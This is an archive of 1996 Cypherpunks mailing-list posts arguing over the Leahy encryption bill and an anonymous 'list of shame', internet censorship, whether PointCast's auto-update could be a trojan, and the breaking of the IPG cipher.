Don't forget to cruise back by Pepsi World!


We're gonna keep showing ya the coolest, hippest stuff out there, including:

- Shaq/Pepsi World's Slammin' Techno Dream Contest
- The Bev-o-Matic Contest
- An exciting, original Shockwave game
- Chat Rooms
- And basically, more entertainment than you can shake a stick at!



Don't forget your squatter id 'cypherpunk' and password 
'cypherpunk', you'll need them to maintain your Squatter's 
rights in Pepsi World.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Mar 1996 21:01:13 +0800
To: "Michael Peponis" <peponmc@fe3.rust.net>
Subject: RE: Yeo, Pea-brained Imbecile
Message-ID: <199603210305.TAA26073@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 3/18/96 +0000, "Michael Peponis" <peponmc@fe3.rust.net> wrote:
>Here is my two cents on the whole subject of countries wanting to recieve the 
>technical and economic benifits of the internet, but reject groups they have 
>moral or ethical problems with.
...
>Given the plethera of reports like this, I will start maintaining a list of 
>country that will not be given access to my site, no FTP, no HTTP, no nothing,
>on top of that, I will hard code into all the new versions of my network aware
> programs to check  for a domain subfix, if it is on of the black
> list, the software will not  function.
....
>They want isolation, let them enjoy the full benifits of that decision.

I've got the opposite view - I think it's worth making access to widespread
parts of the Internet _easier_ for people from countries whose governments
don't want their subjects\\\\\\\\citizens to access them.  Aside from any
good that can be accomplished by building, say, a Singapore Banned
Religion/Politics
web index (since Singapore's recently announced policy is to censor
Usenet access but not http access, so auto-indexing newsgroups would work),
any technology that makes it easier to work around censorship will be useful
for Yankees who want to access controversial groups after Buchanan's elected
(:-)
One part of the problem is building convenient mirrors in free countries;
another is building packet/mail/http/etc. laundries that can be easily ported
to make it difficult to block access to _them_.  Some of the Andrew File System
approaches for the Zundelsite project were interesting, since it's harder
to block access to widely supported back channels, and since it provides
people with non-subversive reasons to support a relay site, they're more likely
to be widespread and supported at sites that censors don't want to totally
block.

Now, building a blacklist of censorious _government_ sites, like *.gov.sg
(or whatever) and blocking them is more interesting.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 21 Mar 1996 16:03:49 +0800
To: cypherpunks@toad.com
Subject: Re: POINTCAST - Could it be a Trojan Horse?
Message-ID: <199603210305.TAA26171@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The following came from another mailing list.
An interesting Cypherpunks opportunity is that it appears to provide
a general broadcasting capability, depending on what authentication methods
(if any) it's using.  Aside from the fun of automatic-upgrade software,
it's a great opportunity for a media hack.  Maybe it won't be widely
supported by April 1, 1996, but it certainly should be by April 1, 1997.
(Hmmm - isn't X-Day in 1997?)  I assume it either runs UDP or runs
http to poll.
                        Bill

>     There is a new web site http://www.pointcast.com which provides a
>     program file pcninstl.exe. You download pcninstl.exe and run the
>     program on your PC from Windows 95 or Windows 3.1
>
>     PCN is a program that interfaces to the Internet using port 80 and
>     provides you customizable up-to-the minute downloads of news
>     headlines, stocks, customizable sports, customizable weather,
>     customizable financial, Internet access (HTTP only with this release)
>     and personal (horoscopes and lotteries).  You can click on the dynamic
>     advertisements and go directly to their web page.  PCN even turns into
>     a dynamic screen saver with your specific preference.  Periodically,
>     you are informed that there is an upgraded version, would you like to
>     down load; automatic upgrades.  PointCast Network is currently in
>     Beta 0.9, is FREE and they say it will continue to be free, support by
>     advertising commercials.  Does this sound too good to be true???
>
>     Well, Maybe it is too good to be true.  This program becomes a proxy
>     operator for you. Downloading, through your firewall, whatever it
>     decides should be downloaded, data, new executables, etc.  What is to
>     prevent a hacker (or cracker if you like that term better) from
>     offering a similar product which captures you PC keystrokes and scans
>     your hard drive and uploads information, accesses your LAN or PC
>     functions, or destroys PC files and data.
>
>     Even worse what if a hacker breaks into the PointCast Web site after
>     it has successfully distributed its product to millions of Internet
>     users?  Are you sure you trust PointCast enough to perform that next
>     automatic upgrade?
>
>     What about other proxy type programs, such as CompuServe's WinCim? It
>     appears that any type of user proxy program opens the door that most
>     of us have closed using firewalls.
>
>     What are you thoughts and comments? Do you have any concerns with
>     products like this? How do you or your company handle these products?
>
>     Thanks,
>     Bill Roswell
>     Occidental Petroleum Corporation
>     email Bill_Roswell@oxy.com or email Messages_Roswell@oxy.com
>
>
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 21 Mar 1996 22:58:25 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: A MODEST PROPOSAL
In-Reply-To: <Pine.SUN.3.91.99.960320115537.26430B-100000@elaine40.Stanford.EDU>
Message-ID: <Pine.SUN.3.91.960320195000.16154A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 20 Mar 1996, Rich Graves wrote:

> I would sign on, but I don't think you want to associate with a crypto-
> jewish anarchist fucking statist nazi free-speech activist censor asshole
> l. detweiler tentacle.

Sure we do.  As Detweiler always says, "The more, the merrier."


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thrdina@ibm.net
Date: Fri, 22 Mar 1996 01:12:31 +0800
To: cypherpunks@toad.com
Subject: unsubsrcribe
Message-ID: <Chameleon.4.01.2.960320200111.thrdina@.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


How can I unsubsribe from this mailing list?


From: THOMAS HRDINA
      Manager - Networks
      Bank of Nova Scotia
      New York Agency
E-mail: thrdina@ibm.net
Date: 03/20/96
Time: 20:00:07






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 21 Mar 1996 23:43:09 +0800
To: declan@well.com>
Subject: Re:
Message-ID: <m0tzbcX-00092pC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:18 PM 3/20/96 -0500, owner-cypherpunks@toad.com wrote:
>Since someone other than Jim Bell and THE LIST OF SHAME author thought I
>was being serious, I thought it wise to respond.

For the record, I couldn't tell whether you were serious or not. (most other 
people seem to have assumed that you were serious...)   Nevertheless, I 
replied, because I was afraid there were other people who were anxious to 
not take good advice merely because they didn't like the source.  If 
anything, I would say the other notes you received make it clear that my 
concern was justified.


>The notion that a measure of criticism from a known enemy, Dorothy
>Denning, corrects the many problems with Leahy's legislation is absurd.

True.  But it was apparently received without negative comment by a number 
of people who would also have "proudly" put their name on this nameless 
character's "list of shame."

For one, I don't really appreciate the pillorying of some of the names on 
that list, either, but there are a number of facts which bother me about 
this whole Leahy bill incident:

1.  The bill seems to be without fingerprints on it.  Nobody (other than 
Leahy, of course) has claimed that he had input into it.  Denning's recent 
comment at least implies that either she had no input, or was strongly 
dissatisfied at the eventual bill. (Despite this, there are plenty of 
"legitimate needs of law enforcement" clauses in that bill, and it is not 
conceivable that she wouldn't have been consulted if the author of the bill 
had any sympathy for the anti-encryption side.)  

Likewise, nobody on "our side" has made the fact of their input known, 
whether or not that input did any good. The question, therefore, is "Who 
knew what and when?"  Who was consulted?  What were their objections?  What 
objections weren't satisfied?  Since the bill at least superficially 
addresses some of our concerns, SOMEBODY must have told Leahy what we want.  
Who?


2.  I haven't seen any analysis of this bill other than Peter Junger's, even 
and especially from some people and organizations that originally came out 
in favor of it.  If anything, those people would be expected to be defending 
their positions, but they've not backed up that early support with anything 
close to a believable position.  (Most are silent.)   The implication is 
that they had no such early analysis done, and came out in favor of the bill 
anyway.  Worse, they aren't correcting their position based on the more 
detailed study that has been done subsequently. 

3.  Because she's a negative barometer,  Denning knows that a positive 
review by her would be as close as she could do to give the "kiss of death" 
to this bill.  Her putative opposition is, therefore, far more interesting 
to us.  If anything, it gives us a marvelous opportunity to ensure the death 
of a bad bill.



I'm waiting for somebody to explain to me why we can't simply re-write the 
Leahy bill, take out all the bad parts and put a number of new protections 
in, and send it back to Leahy and condition our support on that edited bill. 
 If Leahy really thinks he's doing a favor for the pro-encryption people, 
he'll support the corrected bill wholeheartedly.  If, on the other hand, 
it's all just a fraud, there's no hope, and in that case it's better than no 
bill be passed than one that contains a few booby-traps that will explode 
shortly after the bill is passed. 

As far as I can see, time is on our side.  Industry will continue to insist 
on free export of encryption, and there will be few in Congress to oppose 
it.  We already have the 1st amendment which SHOULD defend encryption, 
unless that protection is implicitly weakened by allowing a precent for the 
control of encryption.  In other words, we're going to win in a year or so 
regardless of this Leahy bill, so we can afford to be hard-nosed with our 
support or lack of it.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 07:13:26 +0800
Subject: No Subject
Message-ID: <QQahxs05105.199603210105@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Excerpted from a message to fight-censorship. For the full thread, check out:

       http://fight-censorship.dementia.org/fight-censorship/dl?thread
       =The+Leahy+Crypto+Bill+is+Rancid+Sausage&after=1795&type=short

(On one line, of course.)

-Declan


---------- Forwarded message begins here ----------

From: Stanton McCandlish <mech@eff.org>
Message-Id: <199603190315.TAA05777@eff.org>
To: declan+@CMU.EDU (Declan B. McCullagh)
Date: Mon, 18 Mar 1996 19:15:09 -0800 (PST)
Cc: fight-censorship+@andrew.cmu.edu, junger@pdj2-ra.F-REMOTE.CWRU.Edu,
        tcmay@got.net


[...]

As our statement on the bill made clear, *EFF does not support the Leahy 
bill*, nor do we endorse it, like it, find it useful or any other synonym.
We're happy to see the issues raise again, a la Cantwell, but we 
specifically recommended simple and complete deregulation. As our 
co-founder John Gilmore points out, the Leahy bill as written 
pre-supposes Congressional authority to legislate in this are, and 
Executive authority to regulate under that legislation. These are notions 
that we, and Phil Karn, are challenging in court with Constitutional 
tests we are throwing at the ITAR export regs.

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Garrett <teddygee@visi.net>
Date: Fri, 22 Mar 1996 01:15:35 +0800
To: cypherpunks@toad.com
Subject: Re: IPG cracked with known plaintext
Message-ID: <2.2.32.19960321010626.00bf2408@mail.visi.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:32 PM 3/19/96 GMT, you wrote:
>First let us describe the IPG system in more conventional C:

[snip]

>So this algorithm is easily broken with known plaintext.

I seem to remember some sales named daemon stating that if anyone could break their system, the prize would be the company.  I imagine that the continuing rants from IPG are a means of devaluing the company beyond it's already measly worth, thus making the company unworth claiming.  It's obvious that the system has been trivially broken after a day and a half of being semi-published.

Is there any other point to this?

I could as easily generate an OTP pulling pages at random from the New England Journal Of Medicine or the Microsoft Visual C++ Programmer's Guide and XORing the text with my plaintext...

But that still leaves me in the cipher.obscurity = cipher.security realm, doesn't it?  Think we could sell it???  Of course, as long as it was someone else choosing the pages, I could trust it, right?  (Damn, which smiley is it for sarcasm?)



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMVCqic1+l8EKBK5FAQHLsgf/SnREwZgJa+mDGgeBi5GsMMyBxheWz0n2
Gl6CfPJ8KlSo80a4o+uQEXXVOw4di0T2zC4swXA8OJ0IvtOaIV0fYSYU0fpjZ4JG
yxAfcg/NDkbP6G8WBUC/29JG4p29EyKsZHDVu68SNlyJp6BqWCzBa5WSRrtPd0b7
NLwAnMozdYpV67Q7/uldddm5esIESxHJduCumqlvmOWcP/n3T4IL/B4O9RhC6wXJ
2wa3QO7OMqugl/vJ7WwDLhCDqaHwVDF+wC4r8T25E0LrFuEEFO39otOIebVZF1y6
o16M+UoDZzxASmSTUcyNsT1GohF4ZgSS5FODYGgMYAc/CDzE6jQq1Q==
=TVwd
-----END PGP SIGNATURE-----

---------------------------------------------------------------------------------------------------------
Ted Garrett <teddygee@visi.net>  http://www.visi.net/~teddygee
"Those who desire to give up Freedom in order to gain
  Security will not have, nor do they deserve, either one."
					Thomas Jefferson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 07:13:20 +0800
Subject: No Subject
Message-ID: <QQahxs05695.199603210110@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Alan Bostick writes:
> Declan McCullagh <declan@well.com> wrote:
> 
> > I may have to adjust my position on Leahy's bill. Any legislation that
> > Dorothy Denning attacks so virulently must be worth passing. 
> 
> That could be exactly what They want you to think!

Oh, God. This is really a bit too much, don't you think?

I mean, its obvious that, whatever its flaws, passage of the Leahy
bill would be very bad for the export control droids. Has it occurred
to you that the whole thing might not be a conspiracy and that the
flaws in the bill might just be that -- flaws?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Thu, 21 Mar 1996 23:09:31 +0800
To: Charles Bell <quester@eskimo.com>
Subject: Re: Shameless
In-Reply-To: <Pine.SUN.3.91.960320135357.17338C-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.960320200836.16154C-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 20 Mar 1996, Charles Bell wrote:

> Uh-huh.  And Perry said something about how the `list of shame' looks 
> like an NSA enemies list.
> 
> Why do I sniff a scent of `provocateur'?  Is it just in my nose?

Actually, I doubt Mr/Ms Anonymous is a provocateur.  Reads more
like a paranoid schitzophrenic to me.  Dollars to donuts says 
it's Detweiler.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 05:17:07 +0800
Subject: No Subject
Message-ID: <QQahxu08441.199603210134@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Declan B. McCullagh typed:
> 
> Excerpted from a message to fight-censorship. For the full thread, check out:
> 
>        http://fight-censorship.dementia.org/fight-censorship/dl?thread
>        =The+Leahy+Crypto+Bill+is+Rancid+Sausage&after=1795&type=short
> 
> (On one line, of course.)
> 
> -Declan
> 
> 
> ---------- Forwarded message begins here ----------
> 
> From: Stanton McCandlish <mech@eff.org>
> Message-Id: <199603190315.TAA05777@eff.org>
> To: declan+@CMU.EDU (Declan B. McCullagh)
> Date: Mon, 18 Mar 1996 19:15:09 -0800 (PST)
> Cc: fight-censorship+@andrew.cmu.edu, junger@pdj2-ra.F-REMOTE.CWRU.Edu,
>         tcmay@got.net
> 
> 
> [...]
> 
> As our statement on the bill made clear, *EFF does not support the Leahy 
> bill*, nor do we endorse it, like it, find it useful or any other synonym.
> We're happy to see the issues raise again, a la Cantwell, but we 
                                raised

> specifically recommended simple and complete deregulation. As our 
> co-founder John Gilmore points out, the Leahy bill as written 
> pre-supposes Congressional authority to legislate in this are, and 
                                                            area

> Executive authority to regulate under that legislation. These are notions 
> that we, and Phil Karn, are challenging in court with Constitutional 
> tests we are throwing at the ITAR export regs.
> 
> [...]
> 
> 



--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 05:17:59 +0800
Subject: No Subject
Message-ID: <QQahxu09182.199603210141@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 12:05 PM 3/20/96, Perry E. Metzger is rumored to have typed:
> anonymous-remailer@shell.portal.com writes:
> > Some people have wondered why I am anonymous and attack me.
> > I am not ashamed of my views.
>
> Well, then you should be.
>
> > I write this thread anonymous as a form of protest.
>
> Why is it a form of protest? If you aren't ashamed, post it under your
> name.

What amuses me most about this series of rantings by whomever, other
than the paranoid and baseless claims made by the anonymous poster,
is the number of people who have been complaining about the author doing
so anonymously through a remailer.  The irony of such a situation is
too rich to pass up.

It seems that cypherpunks can dish it out when other newsgroups and
mailing lists suffer such problems ("well, the remailers do nothing
that telneting to port 25 cannot do..." or "internet identity is such
a fiction anyway, get used to it"  seem to be common responses), but
when the cypherpunks lists is the victim of unpleasant anonymous messages
we fall back to the tired refrain of "if you have nothing to hide why
are you posting anonymously."  How sad.

So, why the hypocrisy here?  If you don't want to be bothered by these
messages there is a simple solution, use a mail agent that can filter
out remailer postings and trash them.  Of course this would also kill
interesting messages from others who use remailers, but that's the price
we pay for having remailers that do not support anonymous identity upon
which reputation can be built.

Oh yeah, I forgot...cypherpunks write code (snicker).  So why not stop
bitching and write a bit of code that provides for useful anonymous
reputations and/or fix the glaringly obvious problems with current
remailers.

jim, who is sorry that he is not the one posting such trolls to the list
just to make the puppets dance...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 21 Mar 1996 21:00:44 +0800
To: cypherpunks@toad.com
Subject: Re: unsubsrcribe
Message-ID: <ad760a7105021004bc29@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:00 AM 3/21/96, thrdina@ibm.net wrote:
>How can I unsubsribe from this mailing list?
>
>
>From: THOMAS HRDINA
>      Manager - Networks
>      Bank of Nova Scotia
>      New York Agency

Well, do you want to "unsubsrcribe" or "unsubsribe"?

Not that it matters which of these you choose, but perhaps you ought to use
a correct spelling ("unsubscribe").

Note to others: Other lists I am on have had the same frantic demands that
people be "unsurscribed," "unscribed," and "unnsubscrubbed." I chalk it up
to a nation filled with illiterates.

(Remind me not to open an account at this "Bank of Nova Scotia.")

--Tim

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 21 Mar 1996 21:00:05 +0800
To: cypherpunks@toad.com
Subject: Re: Pepsi World - Gotta Have It!
Message-ID: <2.2.32.19960320144640.00682484@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 06:46 PM 03/20/96 -0600, you wrote:
>Hey Squatter!
>
>Don't forget to cruise back by Pepsi World!

...

>Don't forget your squatter id 'cypherpunk' and password 
>'cypherpunk', you'll need them to maintain your Squatter's 
>rights in Pepsi World.

Gee. Lucky us. :-b

Dave Merriman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMU/9s8VrTvyYOzAZAQEtbwP/c1TamDTSafhTqzbBYIMA1NhgNia3HgnB
EsOu0IBe5/G5kxh8AboFLSSAp6jKVQcSkE+7UlqyPwhWSxSNlQqy1TfNdPh8Qk8W
T9avJAjIdno/tEvcCZCnSyXwNSqqdCJCtNfxwMyviMxY7g1jbZ3E2onvSRPh+1RW
IjLbkhoa1NE=
=Z2c7
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
http://www.shellback.com/personal/merriman/index.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dirsec <unicorn@schloss.li>
Date: Thu, 21 Mar 1996 14:48:14 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: IPG and "Free Samples"
In-Reply-To: <ad75b4b104021004968a@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960320203811.14126A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Mar 1996, Timothy C. May wrote:

> At 7:42 PM 3/20/96, Michael Froomkin wrote:
> >correct me if I'm wrong, but don't the federal direct mail marketing laws
> >say that any unsolicited merchandise sent to a person becomes their
> >property, regardless of any disclaimers to the contrary included in the
> >package?
> 
> The _physical_ item, e.g., a box of soap or a free copy of "Newsweek," but
> presumably not the _intellectual property_, e.g, the contents of
> "Newsweek."
> 
> (Just because I get free samples of magazines does not mean I now can do
> with the contents whatever I wish, such as post them on the Net; copyright
> law is presumably involved.)

However, there is a case to be made that a basic difference between a 
magazine, in this example, and source code exists.

The magazine itself is the instrumentality.  When it's mailed to you, you 
can give it to whomever you like.  The pages and paper are your property, 
along with the ink.

In the case of the code, it is itself the instrumentality.  Handing it 
out for free (unsolicited and without a binding NDA) might render the 
item itself (the code) public domain.  (Or more accurately, the 
act of so distributing it renders it defacto in the public 
domain).  Especially in the context in which this code was released.

I'm not sure it's a compelling argument in and of itself, but in the 
context of the manner of distribution, and the major goof on the part of 
IDG in releasing the material generally, I would suspect no one has much 
to worry about.  Asking for a public review of material, and then 
enforcing "copyrights" when that review releases some of, perhaps even 
all of the material is rather silly.  I'd be surprised if a court paid 
much attention.

Disclaimer: this is an academic, and not a legal opinion.

[Mr. May's disclaimer deleted]

> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 22 Mar 1996 05:19:07 +0800
Subject: No Subject
Message-ID: <QQahxw12625.199603210206@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I just received this as the moderator for comp.os.ms-windows.announce. 

Would that be "Donut" as in "big hole"?

-rich

---------- Forwarded message ----------
Date: Wed, 20 Mar 1996 19:56:54 +0000 (GMT)
From: Michael Burford <mj_burford@pnl.gov>
To: comp-os-ms-windows-announce@cs.washington.edu
Newgroups: comp.os.ms-windows.announce
Subject: ANNOUNCE: Donut: Web Basic Interpreter.

-----------------------------------------------------------------------------
Richland, WA.  March 20, 1996.  Battelle Memorial Institute today released
Donut (1.00 Alpha 1), a Visual Basic form Interpreter for the Web.

Donut is a program that allows a Visual Basic form file to be transmitted 
over the internet and viewed on a user's computer as a form.  This form will 
then interact with the user and their web browser to send or request 
information just like a normal Visual Basic program.  Donut does not require
any Visual Basic files or DLLs in order to work.

This will allow creation of web forms that give the author more control over 
exactly what the form will look like, allows interaction between the Donut 
applet and the user's browser, and allows processing of form information on 
the user's computer instead of on the server.  And it allows you to use 
existing expertise with the very popular and common Visual Basic programming 
language to do so.

Currently Donut is available for the Microsoft Windows operating system 
(Windows 3.x, Windows 95 or NT).  It works with any Windows web browser that
supports the standard interprocess (DDE) communication for web browsers.  
It has been tested and works with Netscape Navigator, Microsoft Internet 
Explorer, and several variations of Mosaic.

Donut should be able to run most simple Visual Basic programs with few if
any modifications.  (Unlike VBScript where you must now cut and paste 
the source code into a HTML page.)

Donut is available without charge to end users.
For more information or to obtain Donut and development information:
http://apc.pnl.gov:2080/donut/


Microsoft, Windows and Visual Basic are trademarks of Microsoft
Corporation.  All other trademarks are the property of their respective
owners.
-----------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Liljenstolpe - SSDS INFOSEC Eng." <Chris.Liljenstolpe@ssds.com>
Date: Thu, 21 Mar 1996 20:58:41 +0800
To: cypherpunks@toad.com
Subject: RC2 or RC4 in silicon
Message-ID: <2.2.32.19960321030918.00c1c81c@denver.ssds.com>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

        Is anybody aware of an RC2 or RC4 implimentation is silicon?  If so,
any pointers would be appreciated.  Please respond directly.

        Regards,
        =Chris

--
   ( (   | (               Chris Liljenstolpe <Chris.Liljenstolpe@ssds.com>
    ) ) (|  ), inc.        SSDS, Inc; 8400 Normandale Lake Blvd.; Suite 993
   business driven         Bloomington, MN   55437; 
 technology solutions      TEL 612.921.2392  FAX 612.921.2395   Fram Fram Free!
 PGP Key 1024/E8546BD5     FE 43 BD A6 3C 13 6C DB  89 B3 E4 A1 BF 6D 2A A9





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 18:19:02 +0800
Subject: No Subject
Message-ID: <QQahxx14005.199603210217@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


anonymous-remailer@shell.portal.com said:
> 
> We can be fortunate that their number is small. At least the ones
> we know about. Only three more since the last report. But even
> one is too many.

Well, you can add me to the list. Although there are a couple of
problems with the Leahy bill, it still seems to me to be a step 
in the right direction. 

> 
> These people have alot to answer for. Ask them who they work for
> and who signs there checks. Ask them why they lie. Ask them why
> they are afraid of your right to privacy. (of course we know why)
> Show them HOW WE FEEL. Let them serve as examples too others if
> they are too cowardly to serve as beacons for truth.

I'll answer up front. I work for the University of Minnesota. I don't
get a check, I have direct deposit. If you saw how much it is, you'll
*know* that I don't speak for them. I haven't lied for a couple of
minutes now, and certainly not about my support for the Leahy bill.
I'm not afraid of any right to privacy, in fact I insist on it and
support it whenever possible.

I don't know how you feel, and I wish you wouldn't show me, as I am
afraid that you feel squishy and slightly damp. That might cause me
to lose my appetite.

> 
> THE LIST OF SHAME:
> B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
> M. Blaze: mab@crypto.com, mab@research.att.com
> J. Bizdos: jim@rsa.com
> S. Safaddar: shabbir@vtw.org
> D. Weinstein: djw@vplus.com
> P.. Peterson: padgett@hobbes.orl.mmc.com
> B. Stewart: stewarts@ix.netcom.com
> B. Unicorn: unicorn@schloss.li
> P. Karn: karn@unix.ka9q.ampr.org
> D. McCullagh: declan@well.com
> 
> BOYCOTT APPLIED CRYPTOGRAPHY, AT&T, VTW, and RSA!!!!

Don't forget grapes!

> 
> THE LEAHY BILL IS 100% PART OF THE PLAN TO KILL FREE CRYPTO.
> YOU DON'T NEED EXPERTS TO THINK FOR YOU! REMEMBER RICO AND WORLD GOVERNMENT!

I can't remember breakfast, now what was that about RICO and World Government?
Did I take over the world again and forget to clean up after myself? Sorry.


-- 
Kevin L. Prigge         | "You can always spot a well informed man -
University of Minnesota |  his views are the same as yours."  
email: klp@tc.umn.edu   |  - Ilka Chase 
PGP Key Fingerprint =  FC E5 EE E7 8B 2E E9 D5  DA 1C 5D 6B 98 52 F6 24  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@beer.CSUA.Berkeley.EDU
Date: Thu, 21 Mar 1996 17:56:48 +0800
To: cypherpunks@toad.com
Subject: See sameer run the talk show circuit.
Message-ID: <199603210518.VAA05745@beer.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



	Well not really. I am doing the "Electronic Frontiers Forum"
thing by Jon Lebkowsky tomorrow evening though on "Club Wired".

see http://www.hotwired.com/club/

-sameer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 10:59:32 +0800
Subject: No Subject
Message-ID: <QQahxy16227.199603210239@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Sandy SandFort wrote:
> A CYPHERPUNK CALL TO ARMS!!!
> 
> (Did I get the style right?)  C'punks, if you feels as I do, 
> please take a few moments to sign up for the LIST OF SHAME?  
> Let's show Bill, Bruce, Matt and all the others what most 
> Cypherpunks really think about them and Mr/Ms Anonymous.

This effectively gets the right point across, but might turn 
Cypherpunks into a USENET newsgroup mass posting of "me too" 
sentiments.  As I agree with Sandy on every point, I reluctantly 
choose to start....

"Please add me to your list of shame, Mr. Anonymous." 

Brad Shantz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Thu, 21 Mar 1996 18:17:36 +0800
Subject: No Subject
